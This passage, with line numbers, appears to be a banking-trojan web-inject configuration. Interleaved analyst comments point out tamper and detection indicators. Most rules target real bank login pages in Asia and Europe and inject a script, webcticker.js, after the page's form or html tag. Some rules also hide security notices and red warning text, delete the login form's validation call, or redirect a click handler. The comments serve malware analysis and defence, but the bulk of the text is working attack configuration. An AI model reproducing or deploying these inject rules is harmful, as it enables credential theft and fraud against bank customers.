  3136. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3137. </modify>
  3138. </actions>
  3139. </httpinject>
  3140. <httpinject>
  3141. <conditions>
  3142. <url type="allow" onpost="1" onget="1" modifiers="">^https://singapore\.lbbw\-business\.com/LBBWCorpWeb/login/.+\.action(\?|$)</url>
  3143. </conditions>
  3144. <actions>
  3145. <modify>
  3146. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
  3147. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3148. </modify>
  3149. </actions>
  3150. </httpinject>
  3151. <httpinject>
  3152. <conditions>
  3153. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://mcm\.bankmandiri\.co\.id/corp/common/login\.do\?action=login</url>
  3154. </conditions>
  3155. <actions>
  3156. <modify>
  3157. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  3158. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3159. </modify>
  3160. </actions>
  3161. </httpinject>
  3162. <httpinject>
  3163. <conditions>
  3164. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://mib\.bankmandiri\.co\.id/sme/common/login\.do\?action=login</url>
  3165. </conditions>
  3166. <actions>
  3167. <modify>
  3168. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  3169. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3170. </modify>
  3171. </actions>
  3172. </httpinject>
  3173. <httpinject>
  3174. <conditions>
  3175. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.maybank2u\.com\.my/mbb/m2u/common/mbbLoginCheckAdapt\.do</url>
  3176. </conditions>
  3177. <actions>
  3178. <modify>
  3179. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
  3180. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3181. </modify>
  3182. </actions>
  3183. </httpinject>
  3184. <httpinject>
  3185. <conditions>
  3186. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.maybank2u\.com\.my/mbb/m2uNOW/common/mbbLoginCheckAdapt\.do</url>
  3187. </conditions>
  3188. <actions>
  3189. <modify>
  3190. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
  3191. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3192. </modify>
  3193. </actions>
  3194. </httpinject>
  3195. <httpinject>
  3196. <conditions>
  3197. <url type="allow" onpost="1" onget="1" modifiers="">^https://sslsecure\.maybank\.com\.sg/cgi\-bin/mbs/scripts/mbb\_login\.jsp(\?|$)</url>
  3198. </conditions>
  3199. <actions>
  3200. <modify>
  3201. <pattern modifiers="sA"><![CDATA[(.+</form>)]]></pattern>
  3202. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3203. </modify>
  3204. </actions>
  3205. </httpinject>
  3206. <httpinject>
  3207. <conditions>
  3208. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.maybank2e\.net/M2E/mbbcustomer/</url>
  3209. </conditions>
  3210. <actions>
  3211. <modify>
  3212. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  3213. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3214. </modify>
  3215. </actions>
  3216. </httpinject>
  3217. <httpinject>
  3218. <conditions>
  3219. <url type="allow" onpost="1" onget="1" modifiers="">^https://cbs\.ncbchina\.cn/corporbank/login\_basic\_e\.jsp(\?|$)</url>
  3220. </conditions>
  3221. <actions>
  3222. <modify>
  3223. <pattern modifiers="sA"><![CDATA[(.+</form>)]]></pattern>
  3224. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3225. </modify>
  3226. </actions>
  3227. </httpinject>
  3228. <httpinject>
  3229. <conditions>
  3230. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://bbmy\.ocbc\.com</url>
  3231. </conditions>
  3232. <actions>
  3233. <modify>
  3234. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  3235. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3236. </modify>
  3237. </actions>
  3238. </httpinject>
  3239. <httpinject>
  3240. <conditions>
  3241. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://elementa\.otpbanka\.hr/gradjani/.*/foweb/nb/eLEMENTa</url>
  3242. </conditions>
  3243. <actions>
  3244. <modify>
  3245. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  3246. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3247. </modify>
  3248. </actions>
  3249. </httpinject>
  3250. <httpinject>
        <!-- Web-inject rule for the English and Croatian welcome pages on www.otpbanka.hr.
             It adds no script include. Instead it rewrites an onclick attribute that begins
             with provjera_fp: the new handler sets window.location.href to the eLEMENTa URL on
             elementa.otpbanka.hr and then returns false, so whatever the original handler did
             no longer runs (the trailing "this.focus" apparently only keeps the rest of the
             original attribute syntactically valid). The target URL fits the condition of the
             elementa.otpbanka.hr rule in this config, which is where the
             scripts/webcticker.js include is added.
             What provjera_fp does on the genuine page is not visible here; verify before
             drawing conclusions about the check being bypassed. -->
  3251. <conditions>
  3252. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://www\.otpbanka\.hr/english/welcome\.htm</url>
  3253. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://www\.otpbanka\.hr/html/dobrodosli\.htm</url>
  3254. </conditions>
  3255. <actions>
  3256. <modify>
  3257. <pattern modifiers="i"><![CDATA[onclick="provjera_fp]]></pattern>
  3258. <replacement><![CDATA[onclick="window.location.href='https://elementa.otpbanka.hr/gradjani/OTP-gradjani.exe/foweb/nb/eLEMENTa';return false;this.focus]]></replacement>
  3259. </modify>
  3260. </actions>
  3261. </httpinject>
  3262. <httpinject>
  3263. <conditions>
  3264. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://net\.pbz\.hr/pbz365/logon.*</url>
  3265. </conditions>
  3266. <actions>
  3267. <modify>
  3268. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
  3269. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3270. </modify>
  3271. </actions>
  3272. </httpinject>
  3273. <httpinject>
  3274. <conditions>
  3275. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://comnet\.pbz\.hr/PbzComnetWeb/app/logon\.html</url>
  3276. </conditions>
  3277. <actions>
  3278. <modify>
  3279. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  3280. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3281. </modify>
  3282. </actions>
  3283. </httpinject>
  3284. <httpinject>
  3285. <conditions>
  3286. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.permatae\-business\.com/corp/common/login\.do\?action=login</url>
  3287. </conditions>
  3288. <actions>
  3289. <modify>
  3290. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  3291. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3292. </modify>
  3293. </actions>
  3294. </httpinject>
  3295. <httpinject>
  3296. <conditions>
  3297. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://e\-finance\.postfinance\.ch/(ef/secure|secure/fp)/html/</url>
  3298. </conditions>
  3299. <actions>
  3300. <modify>
  3301. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
  3302. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3303. </modify>
  3304. </actions>
  3305. </httpinject>
  3306. <httpinject>
  3307. <conditions>
  3308. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://direkt\.rba\.hr/cgi\-bin/ppz2/start/rbat\.jsp</url>
  3309. </conditions>
  3310. <actions>
  3311. <modify>
  3312. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  3313. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3314. </modify>
  3315. </actions>
  3316. </httpinject>
  3317. <httpinject>
  3318. <conditions>
  3319. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://access\.rbsm\.com/logon/(password|dp300)/.+\.fcc(\?|$)</url>
  3320. </conditions>
  3321. <actions>
  3322. <modify>
  3323. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  3324. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3325. </modify>
  3326. </actions>
  3327. </httpinject>
  3328. <httpinject>
  3329. <conditions>
  3330. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://logon\.reflex\.rhbbank\.com\.my/rhbcams/corporate/login\.jsp</url>
  3331. </conditions>
  3332. <actions>
  3333. <modify>
  3334. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  3335. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3336. </modify>
  3337. </actions>
  3338. </httpinject>
  3339. <httpinject>
  3340. <conditions>
  3341. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.sbnet\.splitskabanka\.hr/priv/.*/dciweb\.htm</url>
  3342. </conditions>
  3343. <actions>
  3344. <modify>
  3345. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  3346. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3347. </modify>
  3348. </actions>
  3349. </httpinject>
  3350. <httpinject>
  3351. <conditions>
  3352. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://mcsign\.ba\-ca\.com/smartoffice/\_mcologon\?\.\.OASLogon</url>
  3353. </conditions>
  3354. <actions>
  3355. <modify>
  3356. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  3357. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3358. </modify>
  3359. </actions>
  3360. </httpinject>
  <!-- Rule for the s2b.standardchartered.com SSO login URLs, with two modify actions.
       The first appends the webcticker.js script element after the closing form tag.
       The second hides an existing element of the page. -->
  3361. <httpinject>
  3362. <conditions>
  3363. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://s2b\.standardchartered\.com/ssoapp/(login\.jsp|core\.security\.login\.event)</url>
  3364. </conditions>
  3365. <actions>
  3366. <modify>
  3367. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  3368. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3369. </modify>
  3370. <modify>
  <!-- Adds style="display:none;" to the div with class scbLoginImpContainer01. What that div
       holds is not shown here; by its name it is presumably an important-notice container on
       the login page (confirm against the genuine page). A hidden notice block on this page
       is a tamper indicator in its own right, independent of the script element. -->
  3371. <pattern modifiers="i"><![CDATA[div class="scbLoginImpContainer01"]]></pattern>
  3372. <replacement><![CDATA[div class="scbLoginImpContainer01" style="display:none;"]]></replacement>
  3373. </modify>
  3374. </actions>
  3375. </httpinject>
  3376. <httpinject>
  3377. <conditions>
  3378. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://sme\.standardchartered\.com/commonapp/core\.security\.vascochallenge\.event</url>
  3379. </conditions>
  3380. <actions>
  3381. <modify>
  3382. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  3383. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3384. </modify>
  3385. </actions>
  3386. </httpinject>
  <!-- Rule for the Standard Chartered HK login page. Unlike most rules in this section, the URL
       condition carries no modifiers and ends in (\?|$), so it matches the login.htm path only
       when it is followed by a query string or the end of the URL. -->
  3387. <httpinject>
  3388. <conditions>
  3389. <url type="allow" onpost="1" onget="1" modifiers="">^https://ibank\.standardchartered\.com\.hk/nfs/login\.htm(\?|$)</url>
  3390. </conditions>
  3391. <actions>
  3392. <modify>
  <!-- The capture is (.+</form>) with modifiers "sA". If these are PCRE-style flags (s = dot
       matches newline, A = anchored at the start; an assumption to confirm), the greedy .+
       captures from the start of the body through the last closing form tag, so the script
       element lands after the final form rather than the first one. -->
  3393. <pattern modifiers="sA"><![CDATA[(.+</form>)]]></pattern>
  3394. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3395. </modify>
  3396. </actions>
  3397. </httpinject>
  3398. <httpinject>
  3399. <conditions>
  3400. <url type="allow" onpost="1" onget="1" modifiers="">^https://ibank\.standardchartered\.com\.sg/nfs/login\.htm(\?|$)</url>
  3401. </conditions>
  3402. <actions>
  3403. <modify>
  3404. <pattern modifiers="sA"><![CDATA[(.+</form>)]]></pattern>
  3405. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3406. </modify>
  3407. </actions>
  3408. </httpinject>
  3409. <httpinject>
  3410. <conditions>
  3411. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.onlinesbiglobal\.com/\S+/BANKAWAY($|\?|\;)</url>
  3412. </conditions>
  3413. <actions>
  3414. <modify>
  3415. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  3416. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3417. </modify>
  3418. </actions>
  3419. </httpinject>
  <!-- Rule for the UBS e-banking workbench (hosts ebanking-ch followed by digits), with two
       modify actions. The first appends the webcticker.js script element after the closing html
       tag. The second hides the element with id div_securityinfo_content via visibility:hidden.
       The first replacement also carries an inline script that would set document.body visibility
       back to 'visible' after 7000 ms. That script sits between HTML comment markers inside the
       CDATA, so it reaches the page as an inert comment. It reads as a disabled leftover; nothing
       in this rule hides the whole body.
       Defender view: either the commented-out setTimeout text or a hidden security-info div in
       the rendered login page is a strong tamper indicator for this host. -->
  3420. <httpinject>
  3421. <conditions>
  3422. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ebanking\-ch\d+\.ubs\.com/workbench/Index\.do</url>
  3423. </conditions>
  3424. <actions>
  3425. <modify>
  3426. <pattern modifiers=""><![CDATA[(</html>)]]></pattern>
  3427. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>
  3428. <!--
  3429. <script type="text/javascript" language="JavaScript">
  3430. setTimeout(function() {
  3431. document.body.style.visibility = 'visible';
  3432. }, 7000);
  3433. </script>
  3434. -->
  3435. ]]></replacement>
  3436. </modify>
  3437. <modify>
  3438. <pattern modifiers=""><![CDATA[(div id="div_securityinfo_content")]]></pattern>
  3439. <replacement><![CDATA[\1 style="visibility:hidden;"]]></replacement>
  3440. </modify>
  3441. </actions>
  3442. </httpinject>
  3443. <httpinject>
  3444. <conditions>
  3445. <url type="allow" onpost="1" onget="1" modifiers="i">^https://www\.ucoebanking\.com/BankAwayRetail/.*/web/L001/retail/jsp/user/CorporateSignOn\.aspx(\?|$)</url>
  3446. </conditions>
  3447. <actions>
  3448. <modify>
  3449. <pattern modifiers="isA"><![CDATA[(.+</form>)]]></pattern>
  3450. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3451. </modify>
  3452. </actions>
  3453. </httpinject>
  3454. <httpinject>
  3455. <conditions>
  3456. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://uniservices\d*\.uobgroup\.com/(ELO/login\.jsp|wpe/ca/login\.do|wpe/ca/loginForm\.jsp)(\;|\?|$)</url>
  3457. </conditions>
  3458. <actions>
  3459. <modify>
  3460. <pattern modifiers="Ui"><![CDATA[(</form>)]]></pattern>
  3461. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3462. </modify>
  3463. </actions>
  3464. </httpinject>
  3465. <httpinject>
  3466. <conditions>
  3467. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://biz\.uob\.com\.my/ELO/login\.jsp</url>
  3468. </conditions>
  3469. <actions>
  3470. <modify>
  3471. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
  3472. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3473. </modify>
  3474. </actions>
  3475. </httpinject>
  <!-- Rule for the Vietcombank ibanking Default.aspx page, with two modify actions: the usual
       script element after the closing form tag, plus a style rewrite. -->
  3476. <httpinject>
  3477. <conditions>
  3478. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.vietcombank\.com\.vn/ibanking/Default\.aspx</url>
  3479. </conditions>
  3480. <actions>
  3481. <modify>
  3482. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  3483. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3484. </modify>
  3485. <modify>
  <!-- Matches the inline style text "color: Red; font-weight: bold;" and appends display:none,
       which hides any element styled that way. The rule keys on styling, not on an id, so which
       element it hides is not visible here; presumably a red warning or error message
       (confirm against the genuine page). -->
  3486. <pattern modifiers="i"><![CDATA[color: Red; font\-weight: bold;]]></pattern>
  3487. <replacement><![CDATA[color: Red; font-weight: bold; display:none;]]></replacement>
  3488. </modify>
  3489. </actions>
  3490. </httpinject>
  <!-- Rule for the Vietinbank ipay login page, with two modify actions: the usual script element
       after the closing form tag, plus removal of one of the page's own script statements. -->
  3491. <httpinject>
  3492. <conditions>
  3493. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.vietinbank\.vn/ipay/vbh/login\.do</url>
  3494. </conditions>
  3495. <actions>
  3496. <modify>
  3497. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  3498. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3499. </modify>
  3500. <modify>
  <!-- The replacement is empty, so the matched $("#login").validationEngine ({...}); call is
       deleted from the page. The effect is that the page's own validation setup on the #login
       form no longer runs. A login page served without that call is a page-integrity indicator. -->
  3501. <pattern modifiers="isU"><![CDATA[\$\("#login"\)\.validationEngine \(\{.*\}\);]]></pattern>
  3502. <replacement><![CDATA[]]></replacement>
  3503. </modify>
  3504. </actions>
  3505. </httpinject>
  3506. <httpinject>
  3507. <conditions>
  3508. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.winglungbank\.com/corpbanking/logon/CbHomLogonInp\.jsp(\?|$)</url>
  3509. </conditions>
  3510. <actions>
  3511. <modify>
  3512. <pattern modifiers="isA"><![CDATA[(.+</form>)]]></pattern>
  3513. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3514. </modify>
  3515. </actions>
  3516. </httpinject>
  3517. <httpinject>
  3518. <conditions>
  3519. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.zaba\.hr/ebank/gradjani/InnerLogin\.jsp</url>
  3520. </conditions>
  3521. <actions>
  3522. <modify>
  3523. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  3524. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3525. </modify>
  3526. </actions>
  3527. </httpinject>
  3528. <httpinject>
  3529. <conditions>
  3530. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.irakyat\.com\.my/retail/security/commonLogin\.jsp</url>
  3531. </conditions>
  3532. <actions>
  3533. <modify>
  3534. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
  3535. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3536. </modify>
  3537. </actions>
  3538. </httpinject>
  3539. <httpinject>
  3540. <conditions>
  3541. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.mybsn\.com\.my/mybsn/login/login\.do</url>
  3542. </conditions>
  3543. <actions>
  3544. <modify>
  3545. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  3546. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3547. </modify>
  3548. </actions>
  3549. </httpinject>
  <!-- Rule for the BNI corporate AuthenticationController URL. Same shape as the neighbouring
       rules, with one difference that matters for detection: the script src here is
       "ibank/scripts/webcticker.js", not "scripts/webcticker.js". Log or DOM searches should key
       on the file name webcticker.js, not on the full relative path. -->
  3550. <httpinject>
  3551. <conditions>
  3552. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ibank\.bni\.co\.id/corp/AuthenticationController</url>
  3553. </conditions>
  3554. <actions>
  3555. <modify>
  3556. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  3557. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="ibank/scripts/webcticker.js"></script>]]></replacement>
  3558. </modify>
  3559. </actions>
  3560. </httpinject>
  3561. <httpinject>
  3562. <conditions>
  3563. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ib\.bri\.co\.id/ib\-bri/Login\.html</url>
  3564. </conditions>
  3565. <actions>
  3566. <modify>
  3567. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
  3568. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3569. </modify>
  3570. </actions>
  3571. </httpinject>
  3572. <httpinject>
  3573. <conditions>
  3574. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ib\.bankmandiri\.co\.id/retail/Login\.do</url>
  3575. </conditions>
  3576. <actions>
  3577. <modify>
  3578. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  3579. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3580. </modify>
  3581. </actions>
  3582. </httpinject>
  3583. <httpinject>
  3584. <conditions>
  3585. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.danamonline\.com/onlinebanking/Login/lgn_new\.aspx</url>
  3586. </conditions>
  3587. <actions>
  3588. <modify>
  3589. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
  3590. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3591. </modify>
  3592. </actions>
  3593. </httpinject>
  <!-- Rule for ibank.klikbca.com. The URL condition is anchored at the start but has no path and
       no end anchor, so it matches every URL that begins with this scheme and host, not only a
       login page. Any HTML response under the host that contains a closing html tag gets the
       script element appended. -->
  3594. <httpinject>
  3595. <conditions>
  3596. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ibank\.klikbca\.com</url>
  3597. </conditions>
  3598. <actions>
  3599. <modify>
  3600. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
  3601. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3602. </modify>
  3603. </actions>
  3604. </httpinject>
  3605. <httpinject>
  3606. <conditions>
  3607. <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.hsbc\.co\.uk/1/2/</url>
  3608. </conditions>
  3609. <actions>
  3610. <modify>
  3611. <pattern modifiers="msU"><![CDATA[(</form>)]]></pattern>
  3612. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3613. </modify>
  3614. </actions>
  3615. </httpinject>
  <!-- Rule for the Barclays LoginLink.action URL. The placement differs from the other rules in
       this section: the replacement puts the script element before the captured closing body
       tag (script first, then \1), so the element ends up inside the body, not after a form
       or after the closing html tag. DOM checks that only look past the end of the document
       would miss this variant. -->
  3616. <httpinject>
  3617. <conditions>
  3618. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://bank\.barclays\.co\.uk/olb/auth/LoginLink\.action</url>
  3619. </conditions>
  3620. <actions>
  3621. <modify>
  3622. <pattern modifiers="Ui"><![CDATA[(</body>)]]></pattern>
  3623. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>\1]]></replacement>
  3624. </modify>
  3625. </actions>
  3626. </httpinject>
  3627. <httpinject>
  3628. <conditions>
  3629. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://secure\.cafbank\.org</url>
  3630. </conditions>
  3631. <actions>
  3632. <modify>
  3633. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  3634. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3635. </modify>
  3636. </actions>
  3637. </httpinject>
  <!-- Rule for cardsonline-commercial.com RBSG_Commercial login URLs. As written it looks dormant:
       the pattern is (</htQQQQQml>), which no ordinary HTML page contains, so the modify action
       has nothing to match. This reads as a rule switched off by corrupting its pattern instead
       of deleting it (an inference; the bot's handling is not visible here). Analysts listing
       active targets should record it as present but inactive.
       The url text also runs onto a second line before its closing tag, so the value ends with
       a line break; whether the bot trims that is unknown. -->
  3638. <httpinject>
  3639. <conditions>
  3640. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://cardsonline\-commercial\.com/RBSG\_Commercial/.*Login\.do
  3641. </url>
  3642. </conditions>
  3643. <actions>
  3644. <modify>
  3645. <pattern modifiers="iU"><![CDATA[(</htQQQQQml>)]]></pattern>
  3646. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3647. </modify>
  3648. </actions>
  3649. </httpinject>
  <!-- Host-independent rule: the host part of the URL condition is ".*", so the match is keyed
       only on the path shape /fi<digits>/bb/logon on any HTTPS site. Which institutions that
       path corresponds to is not stated in the settings. Detection for this rule cannot rely on
       a domain list and has to key on the path pattern together with the injected script name. -->
  3650. <httpinject>
  3651. <conditions>
  3652. <url type="allow" onpost="1" onget="1" modifiers="U">^https://.*/fi\d+/bb/logon</url>
  3653. </conditions>
  3654. <actions>
  3655. <modify>
  3656. <pattern modifiers="imsU"><![CDATA[(</form>)]]></pattern>
  3657. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  3658. </modify>
  3659. </actions>
  3660. </httpinject>
  <!-- Last rule in the list, and unlike the others: the URL condition is the unanchored fragment
       ya\.ru (no scheme, no path) and the action injects no script. It only rewrites the opening
       title tag so the page title starts with "XXXYA: ". This looks like a test or canary rule
       for checking that injection works (an inference from its content).
       For analysts, a browser title beginning with "XXXYA: " on a matching page is a harmless,
       visible sign that this configuration is active on the host. -->
  3661. <httpinject>
  3662. <conditions>
  3663. <url type="allow" onpost="1" onget="1" modifiers="iU">ya\.ru</url>
  3664. </conditions>
  3665. <actions>
  3666. <modify>
  3667. <pattern modifiers="i"><![CDATA[<title>]]></pattern>
  3668. <replacement><![CDATA[<title>XXXYA: ]]></replacement>
  3669. </modify>
  3670. </actions>
  3671. </httpinject>
  3672. </httpinjects>
  3673. </settings>